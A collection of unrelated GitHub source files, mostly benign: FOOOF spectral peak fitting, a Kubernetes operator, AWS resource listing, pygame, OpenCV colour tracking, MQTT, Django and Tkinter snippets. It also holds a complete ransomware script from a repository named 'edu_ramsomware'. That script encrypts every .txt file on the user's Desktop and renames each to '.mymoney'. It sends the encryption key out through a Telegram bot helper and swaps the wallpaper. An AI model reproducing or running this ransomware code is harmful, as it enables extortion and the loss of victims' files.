return aperiodic_params
def _fit_peaks(self, flat_iter):
"""Iteratively fit peaks to flattened spectrum.
Parameters
----------
flat_iter : 1d array
Flattened power spectrum values.
Returns
-------
gaussian_params : 2d array
Parameters that define the gaussian fit(s).
Each row is a gaussian, as [mean, height, standard deviation].
"""
# Initialize matrix of guess parameters for gaussian fitting
guess = np.empty([0, 3])
# Find peak: Loop through, finding a candidate peak, and fitting with a guess gaussian
# Stopping procedures: limit on # of peaks, or relative or absolute height thresholds
while len(guess) < self.max_n_peaks:
# Find candidate peak - the maximum point of the flattened spectrum
max_ind = np.argmax(flat_iter)
max_height = flat_iter[max_ind]
# Stop searching for peaks once height drops below height threshold
if max_height <= self.peak_threshold * np.std(flat_iter):
break
# Set the guess parameters for gaussian fitting, specifying the mean and height
guess_freq = self.freqs[max_ind]
guess_height = max_height
# Halt fitting process if candidate peak drops below minimum height
if not guess_height > self.min_peak_height:
break
# Data-driven first guess at standard deviation
# Find half height index on each side of the center frequency
half_height = 0.5 * max_height
le_ind = next((val for val in range(max_ind - 1, 0, -1)
if flat_iter[val] <= half_height), None)
ri_ind = next((val for val in range(max_ind + 1, len(flat_iter), 1)
if flat_iter[val] <= half_height), None)
# Guess bandwidth procedure: estimate the width of the peak
try:
# Get an estimated width from the shortest side of the peak
# We grab shortest to avoid estimating very large values from overlapping peaks
# Grab the shortest side, ignoring a side if the half max was not found
short_side = min([abs(ind - max_ind) \
for ind in [le_ind, ri_ind] if ind is not None])
# Use the shortest side to estimate full-width, half max (converted to Hz)
# and use this to estimate that guess for gaussian standard deviation
fwhm = short_side * 2 * self.freq_res
guess_std = compute_gauss_std(fwhm)
except ValueError:
# This procedure can fail (very rarely), if both left & right inds end up as None
# In this case, default the guess to the average of the peak width limits
guess_std = np.mean(self.peak_width_limits)
# Check that guess value isn't outside preset limits - restrict if so
# Note: without this, curve_fitting fails if given guess > or < bounds
if guess_std < self._gauss_std_limits[0]:
guess_std = self._gauss_std_limits[0]
if guess_std > self._gauss_std_limits[1]:
guess_std = self._gauss_std_limits[1]
# Collect guess parameters and subtract this guess gaussian from the data
guess = np.vstack((guess, (guess_freq, guess_height, guess_std)))
peak_gauss = gaussian_function(self.freqs, guess_freq, guess_height, guess_std)
flat_iter = flat_iter - peak_gauss
# Check peaks based on edges, and on overlap, dropping any that violate requirements
guess = self._drop_peak_cf(guess)
guess = self._drop_peak_overlap(guess)
# If there are peak guesses, fit the peaks, and sort results
if len(guess) > 0:
gaussian_params = self._fit_peak_guess(guess)
gaussian_params = gaussian_params[gaussian_params[:, 0].argsort()]
else:
gaussian_params = np.empty([0, 3])
return gaussian_params
def _fit_peak_guess(self, guess):
"""Fits a group of peak guesses with a fit function.
Parameters
----------
guess : 2d array, shape=[n_peaks, 3]
Guess parameters for gaussian fits to peaks, as gaussian parameters.
Returns
-------
gaussian_params : 2d array, shape=[n_peaks, 3]
Parameters for gaussian fits to peaks, as gaussian parameters.
"""
# Set the bounds for CF, enforce positive height value, and set bandwidth limits
# Note that 'guess' is in terms of gaussian std, so +/- BW is 2 * the guess_gauss_std
# This set of list comprehensions is a way to end up with bounds in the form:
# ((cf_low_peak1, height_low_peak1, bw_low_peak1, *repeated for n_peaks*),
# (cf_high_peak1, height_high_peak1, bw_high_peak, *repeated for n_peaks*))
# ^where each value sets the bound on the specified parameter
lo_bound = [[peak[0] - 2 * self._cf_bound * peak[2], 0, self._gauss_std_limits[0]]
for peak in guess]
hi_bound = [[peak[0] + 2 * self._cf_bound * peak[2], np.inf, self._gauss_std_limits[1]]
for peak in guess]
# Check that CF bounds are within frequency range
# If they are not, update them to be restricted to frequency range
lo_bound = [bound if bound[0] > self.freq_range[0] else \
[self.freq_range[0], *bound[1:]] for bound in lo_bound]
hi_bound = [bound if bound[0] < self.freq_range[1] else \
[self.freq_range[1], *bound[1:]] for bound in hi_bound]
# Unpacks the embedded lists into flat tuples
# This is what the fit function requires as input
gaus_param_bounds = (tuple(item for sublist in lo_bound for item in sublist),
tuple(item for sublist in hi_bound for item in sublist))
# Flatten guess, for use with curve fit
guess = np.ndarray.flatten(guess)
# Fit the peaks
try:
gaussian_params, _ = curve_fit(gaussian_function, self.freqs, self._spectrum_flat,
p0=guess, maxfev=self._maxfev, bounds=gaus_param_bounds,
ftol=self._tol, xtol=self._tol, gtol=self._tol,
check_finite=False, jac=jacobian_gauss)
except RuntimeError as excp:
error_msg = ("Model fitting failed due to not finding "
"parameters in the peak component fit.")
raise FitError(error_msg) from excp
except LinAlgError as excp:
error_msg = ("Model fitting failed due to a LinAlgError during peak fitting. "
"This can happen with settings that are too liberal, leading, "
"to a large number of guess peaks that cannot be fit together.")
raise FitError(error_msg) from excp
# Re-organize params into 2d matrix
gaussian_params = np.array(group_three(gaussian_params))
return gaussian_params
def _create_peak_params(self, gaus_params):
"""Copies over the gaussian params to peak outputs, updating as appropriate.
Parameters
----------
gaus_params : 2d array
Parameters that define the gaussian fit(s), as gaussian parameters.
Returns
-------
peak_params : 2d array
Fitted parameter values for the peaks, with each row as [CF, PW, BW].
Notes
-----
The gaussian center is unchanged as the peak center frequency.
The gaussian height is updated to reflect the height of the peak above
the aperiodic fit. This is returned instead of the gaussian height, as
the gaussian height is harder to interpret, due to peak overlaps.
The gaussian standard deviation is updated to be 'both-sided', to reflect the
'bandwidth' of the peak, as opposed to the gaussian parameter, which is 1-sided.
Performing this conversion requires that the model has been run,
with `freqs`, `modeled_spectrum_` and `_ap_fit` all required to be available.
"""
peak_params = np.empty((len(gaus_params), 3))
for ii, peak in enumerate(gaus_params):
# Gets the index of the power_spectrum at the frequency closest to the CF of the peak
ind = np.argmin(np.abs(self.freqs - peak[0]))
# Collect peak parameter data
peak_params[ii] = [peak[0], self.modeled_spectrum_[ind] - self._ap_fit[ind],
peak[2] * 2]
return peak_params
def _drop_peak_cf(self, guess):
"""Check whether to drop peaks based on center's proximity to the edge of the spectrum.
Parameters
----------
guess : 2d array
Guess parameters for gaussian peak fits. Shape: [n_peaks, 3].
Returns
-------
guess : 2d array
Guess parameters for gaussian peak fits. Shape: [n_peaks, 3].
"""
cf_params = guess[:, 0]
bw_params = guess[:, 2] * self._bw_std_edge
# Check if peaks within drop threshold from the edge of the frequency range
keep_peak = \
(np.abs(np.subtract(cf_params, self.freq_range[0])) > bw_params) & \
(np.abs(np.subtract(cf_params, self.freq_range[1])) > bw_params)
# Drop peaks that fail the center frequency edge criterion
guess = np.array([gu for (gu, keep) in zip(guess, keep_peak) if keep])
return guess
def _drop_peak_overlap(self, guess):
"""Checks whether to drop gaussians based on amount of overlap.
Parameters
----------
guess : 2d array
Guess parameters for gaussian peak fits. Shape: [n_peaks, 3].
Returns
-------
guess : 2d array
Guess parameters for gaussian peak fits. Shape: [n_peaks, 3].
Notes
-----
For any gaussians with an overlap that crosses the threshold,
the lowest height guess Gaussian is dropped.
"""
# Sort the peak guesses by increasing frequency
# This is so adjacent peaks can be compared from right to left
guess = sorted(guess, key=lambda x: float(x[0]))
# Calculate standard deviation bounds for checking amount of overlap
# The bounds are the gaussian frequency +/- gaussian standard deviation
bounds = [[peak[0] - peak[2] * self._gauss_overlap_thresh,
peak[0] + peak[2] * self._gauss_overlap_thresh] for peak in guess]
# Loop through peak bounds, comparing current bound to that of next peak
# If the left peak's upper bound extends pass the right peaks lower bound,
# then drop the Gaussian with the lower height
drop_inds = []
for ind, b_0 in enumerate(bounds[:-1]):
b_1 = bounds[ind + 1]
# Check if bound of current peak extends into next peak
if b_0[1] > b_1[0]:
# If so, get the index of the gaussian with the lowest height (to drop)
drop_inds.append([ind, ind + 1][np.argmin([guess[ind][1], guess[ind + 1][1]])])
# Drop any peaks guesses that overlap too much, based on threshold
keep_peak = [not ind in drop_inds for ind in range(len(guess))]
guess = np.array([gu for (gu, keep) in zip(guess, keep_peak) if keep])
return guess
def _calc_r_squared(self):
"""Calculate the r-squared goodness of fit of the model, compared to the original data."""
r_val = np.corrcoef(self.power_spectrum, self.modeled_spectrum_)
self.r_squared_ = r_val[0][1] ** 2
def _calc_error(self, metric=None):
"""Calculate the overall error of the model fit, compared to the original data.
Parameters
----------
metric : {'MAE', 'MSE', 'RMSE'}, optional
Which error measure to calculate:
* 'MAE' : mean absolute error
* 'MSE' : mean squared error
* 'RMSE' : root mean squared error
Raises
------
ValueError
If the requested error metric is not understood.
Notes
-----
Which measure is applied is by default controlled by the `_error_metric` attribute.
"""
# If metric is not specified, use the default approach
metric = self._error_metric if not metric else metric
if metric == 'MAE':
self.error_ = np.abs(self.power_spectrum - self.modeled_spectrum_).mean()
elif metric == 'MSE':
self.error_ = ((self.power_spectrum - self.modeled_spectrum_) ** 2).mean()
elif metric == 'RMSE':
self.error_ = np.sqrt(((self.power_spectrum - self.modeled_spectrum_) ** 2).mean())
else:
error_msg = "Error metric '{}' not understood or not implemented.".format(metric)
raise ValueError(error_msg)
def _prepare_data(self, freqs, power_spectrum, freq_range, spectra_dim=1):
"""Prepare input data for adding to current object.
Parameters
----------
freqs : 1d array
Frequency values for the power_spectrum, in linear space.
power_spectrum : 1d or 2d array
Power values, which must be input in linear space.
1d vector, or 2d as [n_power_spectra, n_freqs].
freq_range : list of [float, float]
Frequency range to restrict power spectrum to.
If None, keeps the entire range.
spectra_dim : int, optional, default: 1
Dimensionality that the power spectra should have.
Returns
-------
freqs : 1d array
Frequency values for the power_spectrum, in linear space.
power_spectrum : 1d or 2d array
Power spectrum values, in log10 scale.
1d vector, or 2d as [n_power_specta, n_freqs].
freq_range : list of [float, float]
Minimum and maximum values of the frequency vector.
freq_res : float
Frequency resolution of the power spectrum.
Raises
------
DataError
If there is an issue with the data.
InconsistentDataError
If the input data are inconsistent size.
"""
# Check that data are the right types
if not isinstance(freqs, np.ndarray) or not isinstance(power_spectrum, np.ndarray):
raise DataError("Input data must be numpy arrays.")
# Check that data have the right dimensionality
if freqs.ndim != 1 or (power_spectrum.ndim != spectra_dim):
raise DataError("Inputs are not the right dimensions.")
# Check that data sizes are compatible
if freqs.shape[-1] != power_spectrum.shape[-1]:
raise InconsistentDataError("The input frequencies and power spectra "
"are not consistent size.")
# Check if power values are complex
if np.iscomplexobj(power_spectrum):
raise DataError("Input power spectra are complex values. "
"Model fitting does not currently support complex inputs.")
# Force data to be dtype of float64
# If they end up as float32, or less, scipy curve_fit fails (sometimes implicitly)
if freqs.dtype != 'float64':
freqs = freqs.astype('float64')
if power_spectrum.dtype != 'float64':
power_spectrum = power_spectrum.astype('float64')
# Check frequency range, trim the power_spectrum range if requested
if freq_range:
freqs, power_spectrum = trim_spectrum(freqs, power_spectrum, freq_range)
# Check if freqs start at 0 and move up one value if so
# Aperiodic fit gets an inf if freq of 0 is included, which leads to an error
if freqs[0] == 0.0:
freqs, power_spectrum = trim_spectrum(freqs, power_spectrum, [freqs[1], freqs.max()])
if self.verbose:
print("\nFITTING WARNING: Skipping frequency == 0, "
"as this causes a problem with fitting.")
# Calculate frequency resolution, and actual frequency range of the data
freq_range = [freqs.min(), freqs.max()]
freq_res = freqs[1] - freqs[0]
# Log power values
power_spectrum = np.log10(power_spectrum)
## Data checks - run checks on inputs based on check modes
if self._check_freqs:
# Check if the frequency data is unevenly spaced, and raise an error if so
freq_diffs = np.diff(freqs)
if not np.all(np.isclose(freq_diffs, freq_res)):
raise DataError("The input frequency values are not evenly spaced. "
"The model expects equidistant frequency values in linear space.")
if self._check_data:
# Check if there are any infs / nans, and raise an error if so
if np.any(np.isinf(power_spectrum)) or np.any(np.isnan(power_spectrum)):
error_msg = ("The input power spectra data, after logging, contains NaNs or Infs. "
"This will cause the fitting to fail. "
"One reason this can happen is if inputs are already logged. "
"Input data should be in linear spacing, not log.")
raise DataError(error_msg)
return freqs, power_spectrum, freq_range, freq_res
def _add_from_dict(self, data):
"""Add data to object from a dictionary.
Parameters
----------
data : dict
Dictionary of data to add to self.
"""
# Reconstruct object from loaded data
for key in data.keys():
setattr(self, key, data[key])
def _check_loaded_results(self, data):
"""Check if results have been added and check data.
Parameters
----------
data : dict
A dictionary of data that has been added to the object.
"""
# If results loaded, check dimensions of peak parameters
# This fixes an issue where they end up the wrong shape if they are empty (no peaks)
if set(OBJ_DESC['results']).issubset(set(data.keys())):
self.peak_params_ = check_array_dim(self.peak_params_)
self.gaussian_params_ = check_array_dim(self.gaussian_params_)
def _check_loaded_settings(self, data):
"""Check if settings added, and update the object as needed.
Parameters
----------
data : dict
A dictionary of data that has been added to the object.
"""
# If settings not loaded from file, clear from object, so that default
# settings, which are potentially wrong for loaded data, aren't kept
if not set(OBJ_DESC['settings']).issubset(set(data.keys())):
# Reset all public settings to None
for setting in OBJ_DESC['settings']:
setattr(self, setting, None)
# If aperiodic params available, infer whether knee fitting was used,
if not np.all(np.isnan(self.aperiodic_params_)):
self.aperiodic_mode = infer_ap_func(self.aperiodic_params_)
# Reset internal settings so that they are consistent with what was loaded
# Note that this will set internal settings to None, if public settings unavailable
self._reset_internal_settings()
def _regenerate_freqs(self):
"""Regenerate the frequency vector, given the object metadata."""
self.freqs = gen_freqs(self.freq_range, self.freq_res)
def _regenerate_model(self):
"""Regenerate model fit from parameters."""
self.modeled_spectrum_, self._peak_fit, self._ap_fit = gen_model(
self.freqs, self.aperiodic_params_, self.gaussian_params_, return_components=True)
| fooof-tools/fooof | specparam/objs/fit.py | fit.py | py | 60,820 | python | en | code | 312 | github-code | 50 |
9565218848 | import os
import base64
from cryptography.fernet import Fernet
import sent_mes
import wp
class Ramsomware:
def __init__(self, key=None):
self.key = key
self.typ_crypt = None
self.file_target = ['txt']
def generator_key(self):
self.key = Fernet.generate_key()
self.typ_crypt = Fernet(self.key)
sent_mes.telegram_bot_sendtext(str(self.key))
def read_key(self, path="24124576.txt"):
with open(path, 'rb') as files_closed:
aa = files_closed.read()
self.key = files_closed.read()
self.key = aa
def seerch_file(self, path, types, w=False):
for root, dirs, files in os.walk(path):
for name in files:
f = os.path.join(root, name)
if types in f:
if w == True:
self.uncrypt(f)
else:
self.crypt(f)
def crypt(self, path):
with open(path, 'rb') as f:
data = f.read()
fernet = Fernet(self.key)
encrypted = fernet.encrypt(data)
with open(path,'wb') as f:
f.write(encrypted)
base = os.path.splitext(path)[0]
os.rename(path, base + '.mymoney')
def uncrypt(self, path):
base = os.path.splitext(path)[0]
os.rename(path, base + '.txt')
path = base + '.txt'
with open(path,'rb') as f:
data = f.read()
fernet = Fernet(self.key)
encrypted = fernet.decrypt(data)
with open(path, 'wb') as f:
f.write(encrypted)
def check_password(self):
return os.path.exists('24124576.txt')
def check_crypt(path_dmg, types):
for root, dirs, files in os.walk(path_dmg):
for name in files:
f = os.path.join(root, name)
if types in f:
return True
return False
def start_to_the_end():
User=str(os.getenv('USERPROFILE'))
User = User + '\\Desktop'
wr = Ramsomware()
print(User)
if check_crypt(User,'.txt') & ~wr.check_password():
wr.generator_key()
wr.seerch_file(User,'.txt')
dir = os.path.abspath(os.curdir)
imagePath = dir + "/bin/text/exe/1.jpg"
wp.changeBG(imagePath)
else:
if check_crypt(User,'.mymoney') & wr.check_password():
wr.read_key()
wr.seerch_file(User,'.mymoney', True)
else:
print('nie ok')
start_to_the_end()
| Galateos/edu_ramsomware | main.py | main.py | py | 2,593 | python | en | code | 1 | github-code | 50 |
19398309415 | import kopf
import kubernetes
@kopf.on.create('muge.net', 'v1', 'databases')
def create_fn(body,spec, meta, status, **kwargs):
# Get info from Database object
name = body['metadata']['name']
namespace = body['metadata']['namespace']
db_type = spec['type']
tag = spec['tag'] if spec['tag'] else 'latest'
# Make sure type is provided
if not db_type:
raise kopf.HandlerFatalError(f'Type must be set. Got {db_type}.')
# Pod template
pod = {'apiVersion': 'v1', 'metadata': {'name': name, 'labels': {'app': 'db'}}}
# Service template
svc = {'apiVersion': 'v1', 'metadata': {'name': name},'spec': {'selector': {'app': 'db'}, 'type': 'NodePort'}}
# Update templates based on Database specification
image = f'{db_type}:{tag}'
pod['spec'] = {'containers': [{'image': image, 'name': db_type}]}
if db_type == 'mongo':
port = 27017
if db_type == 'mysql':
port = 3306
pod['spec']['containers'][0]['env'] = [{'name': 'MYSQL_ROOT_PASSWORD', 'value': 'my_passwd'}]
svc['spec']['ports'] = [{'port': port, 'targetPort': port}]
# Make the Pod and Service the children of the Database object
kopf.adopt(pod, owner=body)
kopf.adopt(svc, owner=body)
# Object used to communicate with the API Server
api = kubernetes.client.CoreV1Api()
# Create Pod
obj = api.create_namespaced_pod(namespace, pod)
print(f"Pod {obj.metadata.name} created")
# Create Service
obj = api.create_namespaced_service(namespace, svc)
print(f"NodePort Service {obj.metadata.name} created, exposing on port {obj.spec.ports[0].node_port}")
# Update status
msg = f"Pod and Service created by Database {name}"
return {'message': msg}
@kopf.on.delete('muge.net', 'v1', 'databases')
def delete(body, **kwargs):
msg = f"Database {body['metadata']['name']} and its Pod / Service children deleted"
return {'message': msg}
| ianmuge/kopf-test | operator/main.py | main.py | py | 1,939 | python | en | code | 0 | github-code | 50 |
39675483796 | # Just listing some resources with AWS's pagination
# while logging the API Calls from AWS
import boto3
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
def list_lambdas():
client = boto3.client('lambda')
paginator = client.get_paginator('list_functions')
response_iterator = paginator.paginate(
PaginationConfig={
'PageSize': 50
}
)
for response in response_iterator:
for function in response['Functions']:
print(function['FunctionName'])
def list_queues():
client = boto3.client('sqs')
paginator = client.get_paginator('list_queues')
request_iterator = paginator.paginate(
PaginationConfig={
'PageSize': 50
}
)
for page in request_iterator:
for queue_url in page['QueueUrls']:
print(queue_url)
def list_topics():
client = boto3.client('sns')
paginator = client.get_paginator('list_topics')
# The SNS API does not support PageSize
request_iterator = paginator.paginate()
for page in request_iterator:
for item in page['Topics']:
print(item['TopicArn'])
def list_instances():
client = boto3.client('ec2')
paginator = client.get_paginator('describe_instances')
request_iterator = paginator.paginate(
PaginationConfig={
'PageSize': 50
}
)
for page in request_iterator:
for reservation in page['Reservations']:
for instance in reservation['Instances']:
print(instance['InstanceId'])
def lambda_handler(event, context):
list_lambdas()
list_queues()
list_topics()
list_instances()
| gelouko/useful-scripts | aws/list_frenzy.py | list_frenzy.py | py | 1,700 | python | en | code | 1 | github-code | 50 |
1165190937 | import pygame
# A class that handles the unit object.
class Unit:
# Initializes a unit object.
# x,y = the unit's coordinates within the game window
# color = the unit's color
#
def __init__(self, x, y, color):
self.x = x
self.x_target = x
self.y = y
self.y_target = y
self.velocity = 1
self.body = (self.x,self.y,10,10)
self.color = color
self.rect = None
# Draws the unit on the game window.
# window = the game window
#
def draw(self, window):
self.rect = pygame.draw.rect(window, self.color, self.body)
# Moves the unit based on it's relation to the target coordinates and velocity.
#
def move(self):
if abs(self.x_target - self.x) < self.velocity:
self.x = self.x_target
elif self.x_target < self.x:
self.x -= self.velocity
elif self.x_target > self.x:
self.x += self.velocity
if abs(self.y_target - self.y) < self.velocity:
self.y = self.y_target
elif self.y_target < self.y:
self.y -= self.velocity
elif self.y_target > self.y:
self.y += self.velocity
self.update()
# Updates the unit's display properties.
#
def update(self):
self.body = (self.x,self.y, 10, 10)
# Returns the unit's target position.
#
def get_unit_position(self):
return [self.x_target, self.y_target]
# Updates the unit's target positioin.
# target_position = the position this unit is moving to
#
def update_unit_target_position(self, target_position):
self.x_target = target_position[0]
self.y_target = target_position[1] | abmarney/rts-pub | unit.py | unit.py | py | 1,747 | python | en | code | 0 | github-code | 50 |
74269272475 | import cv2
import numpy as np
import configparser
from configparser import SafeConfigParser
def frame_change(pos):
global posicao, new
posicao = pos
new = True
def sliders_update(val):
global new
new = True
def main():
config = configparser.ConfigParser()
config.read('config.ini')
arquivo = config['default']['video']
font = cv2.FONT_HERSHEY_SIMPLEX
posicao = 1
new = False
capture = cv2.VideoCapture(arquivo)
_, image = capture.read()
image_line1 = np.hstack((image, image))
image_line2 = np.hstack((image, image))
image = np.vstack((image_line1, image_line2))
blur = int(config['default']['blur'])
Bsize = int(config['default']['Bsize'])
Hmin = int(config['default']['Hmin'])
Hmax = int(config['default']['Hmax'])
Smin = int(config['default']['Smin'])
Smax = int(config['default']['Smax'])
Vmin = int(config['default']['Vmin'])
Vmax = int(config['default']['Vmax'])
cv2.namedWindow("image")
cv2.createTrackbar('Frame','image',0,int(capture.get(cv2.CAP_PROP_FRAME_COUNT)),frame_change)
cv2.createTrackbar('Blur','image',blur,30,sliders_update)
cv2.createTrackbar('Hmin','image',Hmin,100,sliders_update)
cv2.createTrackbar('Hmax','image',Hmax,179,sliders_update)
cv2.createTrackbar('Smin','image',Smin,255,sliders_update)
cv2.createTrackbar('Smax','image',Smax,255,sliders_update)
cv2.createTrackbar('Vmin','image',Vmin,255,sliders_update)
cv2.createTrackbar('Vmax','image',Vmax,255,sliders_update)
cv2.createTrackbar('Bsize','image',Bsize,50,sliders_update)
rmin = Bsize - int(Bsize/3) # Raio minimo para ser considerado um objeto circular (em pixels)
rmax = Bsize + int(Bsize/3)
while True:
if new:
new = False
capture.set(cv2.CAP_PROP_POS_FRAMES, posicao)
_, image_raw = capture.read()
blur = int(cv2.getTrackbarPos('Blur', 'image'))
if blur%2 == 0:
blur += 1
Hmin = int(cv2.getTrackbarPos('Hmin', 'image'))
Hmax = int(cv2.getTrackbarPos('Hmax', 'image'))
Smin = int(cv2.getTrackbarPos('Smin', 'image'))
Smax = int(cv2.getTrackbarPos('Smax', 'image'))
Vmin = int(cv2.getTrackbarPos('Vmin', 'image'))
Vmax = int(cv2.getTrackbarPos('Vmax', 'image'))
Bsize = int(cv2.getTrackbarPos('Bsize', 'image'))
Hmax = int(cv2.getTrackbarPos('Hmax', 'image'))
# TODO: max nao pode ser menor que min para H, S e V
image_blur = cv2.blur(image_raw, (blur, blur))
image_hsv = cv2.cvtColor(image_blur, cv2.COLOR_BGR2HSV)
image_thresh = cv2.inRange(image_hsv,np.array((Hmin, Smin, Vmin)), np.array((Hmax, Smax, Vmax)))
image_thresh = cv2.blur(image_thresh,(blur, blur))
try:
rmin = Bsize - int(Bsize/3)
rmax = Bsize + int(Bsize/3)
print(rmin, rmax)
cir = cv2.HoughCircles(image_thresh,cv2.HOUGH_GRADIENT,1,200,
param1=25,param2=25,minRadius=5,maxRadius=20)
if cir is not None:
for i in cir:
for j in i:
if j[0] > 0:
cv2.circle(image_raw,(j[0],j[1]), int(j[2]), (255,255,0),5)
print(f'x={j[0]} \t y={j[1]}')
except Exception as e:
print('Exception: ', e)
cv2.putText(image_raw,'sair: q',(10,30), font, 1, (0, 0, 255), 2, cv2.LINE_AA)
cv2.putText(image_raw,'reset: r',(10,90), font, 1, (0, 0, 255), 2, cv2.LINE_AA)
cv2.putText(image_raw,'Salvar: s',(10,150), font, 1, (0, 0, 255), 2, cv2.LINE_AA)
image_line1 = np.hstack((image_raw, image_blur))
image_thresh = cv2.cvtColor(image_thresh, cv2.COLOR_GRAY2BGR)
image_line2 = np.hstack((image_thresh, image_blur))
image = np.vstack((image_line1, image_line2))
cv2.imshow("image", image)
key = cv2.waitKey(1) & 0xFF
# r para resset
if key == ord("r"):
posicao = 1
capture.set(cv2.CAP_PROP_POS_FRAMES, posicao)
_, image = capture.read()
elif key == ord('s'):
blur = int(cv2.getTrackbarPos('Blur', 'image'))
if blur%2 == 0:
blur += 1
Hmin = int(cv2.getTrackbarPos('Hmin', 'image'))
Hmax = int(cv2.getTrackbarPos('Hmax', 'image'))
Smin = int(cv2.getTrackbarPos('Smin', 'image'))
Smax = int(cv2.getTrackbarPos('Smax', 'image'))
Vmin = int(cv2.getTrackbarPos('Vmin', 'image'))
Vmax = int(cv2.getTrackbarPos('Vmax', 'image'))
Bsize = int(cv2.getTrackbarPos('Bsize', 'image'))
parser = SafeConfigParser()
parser.read('config.ini')
parser.set('atual', 'blur', str(blur))
parser.set('atual', 'Hmin', str(Hmin))
parser.set('atual', 'Smin', str(Smin))
parser.set('atual', 'Smax', str(Smax))
parser.set('atual', 'Vmin', str(Vmin))
parser.set('atual', 'Vmax', str(Vmax))
parser.set('atual', 'Bsize', str(Bsize))
with open('config.ini', 'w+') as configfile:
parser.write(configfile)
elif key == ord("q"):
break
cv2.destroyAllWindows()
if __name__ == '__main__':
main() | Atzingen/rastreador-pendulo | cmd_code/set_filters.py | set_filters.py | py | 5,550 | python | en | code | 0 | github-code | 50 |
72751883675 | import sys
##fonctions
def validation_arg(qte = 3, msg_usage = "script.py input output"):
if len(sys.argv) != qte:
print("Option illégale")
print("Usage: ", msg_usage)
sys.exit(-1)
def extraire_metaDonnees(fichier):
fh = open(fichier, "r")
valeur1, valeur2 = fh.readline().split()
fh.close()
return int(valeur1), int(valeur2)
def extraire_ds_dict(fichier):
dict = {}
for each in fichier:
elmt1, elmt2 = each.split()
dict[elmt1] = elmt2
return dict
def lectureAdict(fichier):
fh = open(fichier, "r")
#nb_seq, taille_seq = extraire_metaDonnees(fh)
next(fh)
dict = extraire_ds_dict(fh)
fh.close()
return dict
def impressionDict(dict, out = "std"):
for nom, valeur in dict.items():
print(nom, valeur, file = out) #Permet de ne garder qu'un seul saut de ligne à chacune des
def ecriture(fichier, contenu):
fh = open(fichier, "w")
impressionDict(contenu, fh)
print("écriture terminée")
##Processus
validation_arg()
nb_seq, taille_seq = extraire_metaDonnees(sys.argv[1])
sequences = lectureAdict(sys.argv[1])
print(nb_seq, taille_seq)
print(sequences)
ecriture(sys.argv[2], sequences)
print("\nFin de script")
| AnneMay/DESS-bioinfo | INF8212/cp_dict.py | cp_dict.py | py | 1,230 | python | fr | code | 0 | github-code | 50 |
1376070763 | import math
TickSize = .01 # change it to .1 for illiquid stocks
LotSize = 100
OptionSize = 100
M = 10 # max round lots for holding
K = 5 # max round lots for each trading action
H = 5 # mean reversion half life
S0 = 50
Lambda = math.log(2) / H
theta = .5
sigma = .1
sigma_dh = .01
kappa = 1e-4
kappa_dh = .1
alpha = .02
factor_alpha = -.01
factor_sensitivity = .5
factor_sigma = .12
p_e = 50
| sophiagu/RLF | gym-rlf/gym_rlf/envs/Parameters.py | Parameters.py | py | 395 | python | en | code | 7 | github-code | 50 |
25971216929 | #!/usr/bin/env python3
import paho.mqtt.client as mqtt
import uuid
import sys
LOCAL_MQTT_HOST="169.62.47.162"
LOCAL_MQTT_PORT=1883
LOCAL_MQTT_TOPIC="persist_faces"
def on_connect_local(client, userdata, flags, rc):
print("connected to local broker with rc: " + str(rc))
def on_message(client,userdata, msg):
try:
print("message received!")
print("Received message of len:{} bytes from topic:{}".format(len(msg.payload), msg.topic) )
# Publishing this message to the cloud broker
guid = str(uuid.uuid4())
msg = msg.payload
file_path = "/mnt/w251-homework3/" + "detect_faces" + guid + ".png"
with open(file_path, 'wb') as outfile:
outfile.write(msg)
except:
print("Unexpected error:", sys.exc_info()[0])
local_mqttclient = mqtt.Client()
local_mqttclient.on_connect = on_connect_local
local_mqttclient.connect(LOCAL_MQTT_HOST, LOCAL_MQTT_PORT, 60)
local_mqttclient.subscribe(LOCAL_MQTT_TOPIC, qos=2)
local_mqttclient.on_message = on_message
# go into a loop
local_mqttclient.loop_forever()
| sthiruvallur/face_detection_edge_to_cloud | cloud_src/cloud_persist_msg/persist_image.py | persist_image.py | py | 1,040 | python | en | code | 1 | github-code | 50 |
33002225914 | from django.urls import path
from . import views
urlpatterns = [
path('', views.myAccount),
path('registerUser/', views.registerUser, name='registerUser'),
path('login/', views.login, name='login'),
path('logout/', views.logout, name='logout'),
path('helloWorld/', views.helloWorld, name='helloWorld'),
] | moxex/yetti-tech | users/urls.py | urls.py | py | 326 | python | en | code | 0 | github-code | 50 |
40886710059 | n = f = 0
while True:
#numero inteiro
try:
n = int(input('Digite um número inteiro: '))
except Exception as ValueError:
print ('Número inteiro inválido. ', end='')
except Exeception as KeyboardInterrupt:
print ('O usuário preferiu não informar')
else:
break
while True:
#numero float
try:
f = float(input('Digite um número flutuante: '))
except Exception as ValueError:
print ('Número flutuante inválido. ', end='')
except Exeception as KeyboardInterrupt:
print ('O usuário preferiu não informar')
else:
break
print ('O número inteiro digitado foi {}'.format(n))
print ('O número flutuante digitado foi {}'.format(f))
| lucasclemerson/course-python | exercicios/exe113.py | exe113.py | py | 675 | python | pt | code | 0 | github-code | 50 |
25730093355 | from django.urls import path
from . import views
app_name = 'posts'
urlpatterns = [
path('', views.index, name='index'),
path('create/', views.create, name='create'),
path('<int:pk>', views.detail, name='detail'),
path('<int:pk>/update/', views.update, name='update'),
path('<int:pk>/delete/', views.delete, name='delete'),
path('<int:pk>/likes/', views.likes, name='likes'),
path('<int:pk>/reviews/', views.review_create, name='review_create'),
path('<int:review_pk>/delete', views.review_delete, name='review_delete'),
path('search/', views.search, name='search'),
path('<int:review_pk>/review_detail', views.review_detail, name='review_detail'),
] | myeonghwan57/Pair_project_01 | matdori/posts/urls.py | urls.py | py | 692 | python | en | code | 0 | github-code | 50 |
22351628247 | import urllib, io
from Tkinter import *
from PIL import Image, ImageTk
root = Tk()
fd = urllib.urlopen("http://www.google.com/images/srpr/logo11w.png")
imgFile = io.BytesIO(fd.read())
im = ImageTk.PhotoImage(Image.open(imgFile)) # <-- here
image = Label(root, image = im)
image.grid(row = 7, column = 1)
root.mainloop() | MBAustin/happy-birthday-dad | test_files/imageTest.py | imageTest.py | py | 324 | python | en | code | 0 | github-code | 50 |
35685315220 | import numpy as np
import matplotlib.pyplot as plt
fig, ax_lst = plt.subplots(1, 1)
x = np.linspace(0, 2, 100)
y = np.square(np.sin(x-2))*np.exp(-1*np.square(x))
plt.plot(x, y, label='f(x)')
plt.xlabel('x-axis')
plt.ylabel('y-axis')
plt.title('Exercise 10')
plt.legend()
plt.show() | wyfapril/CS6112017 | PythonExercises/exercise10.py | exercise10.py | py | 283 | python | en | code | 0 | github-code | 50 |
7466642366 | from config import timevert
